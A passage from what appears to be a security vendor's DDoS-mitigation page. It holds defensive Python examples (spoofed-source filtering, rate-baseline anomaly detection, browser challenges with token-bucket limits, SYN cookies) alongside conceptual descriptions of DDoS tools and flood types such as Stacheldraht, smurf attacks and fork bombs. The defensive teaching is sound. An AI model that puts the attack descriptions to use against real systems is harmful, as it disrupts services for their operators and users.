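# Constructed sample: a spoofed flood mixed with two legitimate clients.
SAMPLE = [
    ("10.1.2.3", "198.51.100.10", "tcp/80"),       # RFC 1918 source on the Internet: spoofed
    ("127.0.0.1", "198.51.100.10", "tcp/80"),      # loopback as source: spoofed
    ("203.0.113.200", "198.51.100.10", "tcp/80"),  # known infected host
    ("203.0.113.5", "198.51.100.10", "tcp/80"),    # legitimate client
    ("198.51.100.77", "198.51.100.10", "udp/53"),  # known infected host
    ("2001:db8::1", "198.51.100.10", "tcp/443"),   # legitimate IPv6 client
    ("fe80::1", "198.51.100.10", "tcp/443"),       # link-local as source: spoofed
]

if __name__ == "__main__":
    fwd, drop = apply_border_acl(SAMPLE)
    print("forwarded:", [p[0] for p in fwd])
    print("dropped:", drop)
```

    The check is a longest-prefix style membership test, which is exactly what a hardware ACL does at wire speed; the "infected hosts" set is the only part that changes at runtime, so it is the part an operator should expect to age out entries from.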

    At the next layer, protocol state such as the TCP three-way handshake is verified. SYN floods and similar DDoS attempts that do not conform to the protocol standard are filtered out here. To mitigate spoofed attacks, Securimetric uses challenge-response techniques such as TCP SYN cookies and TCP SYN authentication to distinguish spoofed from legitimate traffic.

    Securimetric applies both statistical analysis and anomaly recognition to filter zero-day attacks. Using statistical analysis, an unusual number of packets or a high traffic rate from zombie clients can be identified and filtered. Using anomaly recognition, automatically learned baselines for protocol and source-network flows are used to identify and filter malicious activity.
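    The baseline approach above amounts to learning, per protocol or port, what a single source normally sends, and then flagging sources that exceed that by a statistically large margin. The block below is an added example of that logic in Python, not Securimetric's system: it learns a mean and standard deviation of per-source packet rates from a quiet training window, then flags sources in a live window whose peak rate exceeds mean + k standard deviations, with an absolute floor so that a near-silent baseline does not flag every client. The flow summaries are constructed for the example.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed per-second flow summaries: (second, src_ip, dst_port, packets).
# TRAINING is a quiet period used to learn "normal" per destination port.
TRAINING = [
    (0, "192.0.2.10", 80, 5), (0, "192.0.2.11", 80, 10), (0, "192.0.2.12", 80, 15),
    (1, "192.0.2.10", 80, 10), (1, "192.0.2.11", 80, 5), (1, "192.0.2.12", 80, 15),
]
# LIVE is the window under inspection: the same clients plus a few zombies.
LIVE = [
    (100, "192.0.2.10", 80, 8), (100, "192.0.2.11", 80, 14),
    (100, "203.0.113.1", 80, 250), (100, "203.0.113.2", 80, 300), (100, "203.0.113.3", 53, 30),
    (101, "192.0.2.10", 80, 12), (101, "203.0.113.1", 80, 240),
]


def per_source_rates(records):
    """Sum packets per (second, src, port) -> {(src, port): [pps, pps, ...]}."""
    per_second = defaultdict(int)
    for second, src, port, packets in records:
        per_second[(second, src, port)] += packets
    rates = defaultdict(list)
    for (second, src, port), pps in sorted(per_second.items()):
        rates[(src, port)].append(pps)
    return rates


def learn_baseline(records):
    """Per destination port: mean and population std-dev of one source's packets/second."""
    samples = defaultdict(list)
    for (src, port), pps_list in per_source_rates(records).items():
        samples[port].extend(pps_list)
    return {port: (mean(v), pstdev(v)) for port, v in samples.items()}


def detect(records, baseline, k=3.0, min_pps=20):
    """Flag (src, port) pairs whose peak rate exceeds mean + k*std for that port.
    min_pps is a floor; a port with no baseline at all is judged on the floor only
    (traffic to a port never seen in training is itself worth a look)."""
    offenders = {}
    for (src, port), pps_list in per_source_rates(records).items():
        peak = max(pps_list)
        if port in baseline:
            m, s = baseline[port]
            threshold = max(m + k * s, min_pps)
        else:
            threshold = min_pps
        if peak > threshold:
            offenders[(src, port)] = peak
    return offenders


if __name__ == "__main__":
    base = learn_baseline(TRAINING)
    for key, peak in sorted(detect(LIVE, base).items()):
        print(f"anomalous source {key[0]} -> port {key[1]}: peak {peak} pps")
```

    With the constructed training data the port 80 baseline is a mean of 10 pps and a standard deviation of about 4.1, so the k=3 threshold sits near 22 pps: the legitimate clients at 8 to 14 pps stay under it, the two zombies at 240 to 300 pps are flagged, and the DNS source is flagged because nothing in training ever spoke to port 53 and it exceeds the floor. A deployment would learn over hours rather than two seconds, and would re-learn slowly so that an ongoing attack cannot poison its own baseline.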

    Securimetric's DDoS mitigation system continuously monitors application traffic for unusual patterns and behavior. Using its proprietary pattern recognition and analysis system, Securimetric deters morphing HTTP flood attacks by rapidly adapting flexible content filters to counter evasion attempts.

    Securimetric's deep packet inspection engine provides comprehensive application-layer intelligence, allowing Securimetric to identify which applications are running on the client's network and to select and block application-layer traffic violations efficiently.

    With a growing number of attacks in which large numbers of clients (zombies) use valid, fully established connections to overwhelm system resources, Securimetric's anti-zombie system mitigates such HTTP attacks with a challenge-response process that distinguishes legitimate browsers from the zombie programs accessing the attacked site.

    To further mitigate application-specific attacks such as HTTP floods, Securimetric can enforce intelligent filtering of malformed HTTP to ensure the validity of HTTP transactions, and can limit the number of connections or requests to specific objects.

    Rate limiting is applied against baseline statistics to further limit exploitation of system and bandwidth resources.
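    The three preceding paragraphs describe one front-door pipeline: a challenge that only a real browser completes, a per-object request limit, and a per-client rate limit. The block below is an added example of that pipeline in Python; it is not Securimetric's implementation. The challenge is an HMAC token bound to the client address and a timestamp (in practice delivered as a cookie set by a short JavaScript redirect, which a zombie that neither runs scripts nor keeps cookies never completes), and both limits are token buckets. The secret, the limits and the request sequence are assumptions made for the example.

```python
import hashlib
import hmac
import time

# Assumptions for this example: a server-side secret (rotate it in practice)
# and a fixed lifetime after which a client must solve the challenge again.
SECRET = b"example-front-door-secret"
CHALLENGE_TTL = 300  # seconds


def _sign(client_ip, issued):
    msg = f"{client_ip}|{issued}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:32]


def issue_challenge(client_ip, now):
    """Token the client must echo back on its next request."""
    issued = int(now)
    return f"{issued}.{_sign(client_ip, issued)}"


def verify_challenge(client_ip, token, now):
    """True only for an unexpired token signed for this client address.
    Binding to the address stops a harvested token being replayed by other zombies."""
    if not token or "." not in token:
        return False
    issued_s, sig = token.split(".", 1)
    if not issued_s.isdigit():
        return False
    issued = int(issued_s)
    if not 0 <= now - issued <= CHALLENGE_TTL:
        return False
    return hmac.compare_digest(sig, _sign(client_ip, issued))


class TokenBucket:
    """Classic rate limiter: `rate` tokens/second refill, at most `burst` stored."""

    def __init__(self, rate, burst):
        self.rate, self.burst = rate, burst
        self.tokens, self.last = burst, None

    def allow(self, now):
        if self.last is not None:
            self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


class FrontDoor:
    """Per request returns ('challenge', token), ('pass', None) or ('throttle', None)."""

    def __init__(self, client_rps=5, client_burst=10, object_limits=None):
        self.client_rps, self.client_burst = client_rps, client_burst
        self.object_limits = object_limits or {}  # path -> (rps, burst)
        self.client_buckets = {}
        self.object_buckets = {}

    def handle(self, client_ip, path, token=None, now=None):
        now = time.time() if now is None else now
        # 1. anti-zombie challenge: no valid token, no service
        if not verify_challenge(client_ip, token, now):
            return "challenge", issue_challenge(client_ip, now)
        # 2. per-client rate limit against the whole site
        bucket = self.client_buckets.setdefault(
            client_ip, TokenBucket(self.client_rps, self.client_burst))
        if not bucket.allow(now):
            return "throttle", None
        # 3. tighter per-object limit for expensive paths (search, login, ...)
        if path in self.object_limits:
            rps, burst = self.object_limits[path]
            ob = self.object_buckets.setdefault((client_ip, path), TokenBucket(rps, burst))
            if not ob.allow(now):
                return "throttle", None
        return "pass", None


if __name__ == "__main__":
    fd = FrontDoor(object_limits={"/search": (1, 1)})
    verdict, tok = fd.handle("192.0.2.7", "/", None, 1000.0)
    print(verdict, tok)                                  # challenge, then with the token:
    print(fd.handle("192.0.2.7", "/", tok, 1000.5)[0])   # pass
```

    Two details matter in practice. The token is bound to the source address, so a zombie cannot harvest one token with a real browser and hand it to the rest of the botnet; clients behind a large NAT share one address and therefore one bucket, which is the usual reason the per-client limit is set generously and the per-object limit is where the real protection lives.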

    A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

    Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

    A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

    Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

    These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification, such as smurf attacks and fraggle attacks (also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes.

    Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well-distributed DDoS. These flood attacks do not require completion of the TCP three-way handshake and attempt to exhaust the destination's SYN queue or the server's bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as SYN cookies may be an effective mitigation against SYN queue flooding; complete bandwidth exhaustion, however, may require the involvement of upstream providers to filter the traffic before it reaches the victim's link.
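    SYN cookies, named above and in the earlier description of Securimetric's handshake verification, work by making the server's initial sequence number a keyed function of the connection's 4-tuple, the client's ISN and a coarse time counter, so that no half-open state is stored until the client proves it received the SYN-ACK by echoing that number back. The block below is an added example of the scheme in Python; it is a simplified illustration, not the Linux or BSD layout (those pack the bits differently and use a different hash), and the secret, counter period and MSS table are assumptions made for the example.

```python
import hashlib
import hmac
import struct
import time

# Assumptions for this example: a per-process secret (a real stack rotates it)
# and a 64-second counter, so a cookie stays valid for roughly one to two minutes.
SECRET = b"example-syn-cookie-secret"
COUNTER_PERIOD = 64
# The client's MSS is the one piece of handshake state worth keeping; it is
# encoded as an index into this table so that it fits into the cookie.
MSS_TABLE = (536, 1300, 1440, 1460)


def _counter(now):
    return int(now // COUNTER_PERIOD)


def _keyed_hash(src_ip, src_port, dst_ip, dst_port, client_isn, counter):
    """24-bit keyed hash over the 4-tuple, the client's ISN and the time counter."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}:{client_isn}@{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return struct.unpack(">I", digest[:4])[0] & 0xFFFFFF


def make_syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, mss, now=None):
    """Server ISN for the SYN-ACK. Layout: 5 bits counter | 3 bits MSS index | 24 bits hash.
    Nothing is stored, so SYNs that are never ACKed cannot fill the SYN queue."""
    now = time.time() if now is None else now
    counter = _counter(now)
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):  # largest table entry not above the client's MSS
        if m <= mss:
            mss_idx = i
    h = _keyed_hash(src_ip, src_port, dst_ip, dst_port, client_isn, counter)
    return ((counter & 0x1F) << 27) | (mss_idx << 24) | h


def check_syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, ack, now=None):
    """Validate the handshake's final ACK. Returns the negotiated MSS, or None if
    the cookie was forged (a spoofed source never saw the SYN-ACK) or has expired.
    client_isn is the ACK segment's sequence number minus one."""
    now = time.time() if now is None else now
    cookie = (ack - 1) & 0xFFFFFFFF
    counter_bits = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    if mss_idx >= len(MSS_TABLE):
        return None
    cur = _counter(now)
    for counter in (cur, cur - 1):  # accept the current tick and the previous one
        if counter & 0x1F != counter_bits:
            continue
        if _keyed_hash(src_ip, src_port, dst_ip, dst_port, client_isn, counter) == cookie & 0xFFFFFF:
            return MSS_TABLE[mss_idx]
    return None


if __name__ == "__main__":
    isn = make_syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, 12345, 1460)
    print("SYN-ACK seq:", hex(isn))
    print("MSS from ACK:", check_syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, 12345, isn + 1))
```

    The trade-off is visible in the layout: only the MSS survives the round trip, so TCP options such as window scaling and SACK are lost for cookie-validated connections, which is why stacks enable cookies only once the SYN queue is under pressure rather than all the time.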

    Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals.

    It is important to note the difference between a DDoS and DoS attack. If an attacker mounts an attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

    The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down.

    These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

    "Pulsing" zombies are compromised computers that are directed to launch intermittent, short-lived floods against victim websites with the intent of merely slowing them rather than crashing them. This type of attack, referred to as "degradation-of-service" rather than "denial-of-service", can be more difficult to detect than regular zombie floods and can disrupt and hamper connections to websites for prolonged periods, potentially causing more damage than a concentrated flood. Detecting degradation-of-service attacks is further complicated by the difficulty of discerning whether the bursts really are attacks or merely healthy, and likely desired, increases in website traffic.

    Various DoS-causing exploits, such as buffer overflows, can cause server software to misbehave and fill the disk space or consume all available memory or CPU time.

    Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

    A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

    Copyright © Securimetric Corporation. All rights reserved.